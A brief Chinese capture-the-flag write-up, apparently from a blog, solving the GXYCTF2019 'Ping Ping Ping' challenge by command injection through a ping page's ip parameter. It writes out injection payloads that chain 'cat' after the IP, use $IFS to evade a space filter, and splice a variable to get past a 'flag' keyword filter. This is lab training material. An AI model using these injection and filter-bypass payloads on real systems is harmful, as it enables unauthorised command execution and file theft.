先尝试输入ip=127.0.0.1
发现啥也没有
再次在后面输入ls查看文件
发现有两个文件
Cat一下
发现有空格过滤
进行空格绕过$(IFS)(?ip=127.0.0.1;cat$IFS$1flag.php)
发现符合也进行了过滤
尝试进行拼接flag
?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php
发现flag
标签:127.0,IFS,0.1,ip,3142587,Ping,GXYCTF2019 From: https://www.cnblogs.com/GoldfishMemory/p/17487244.html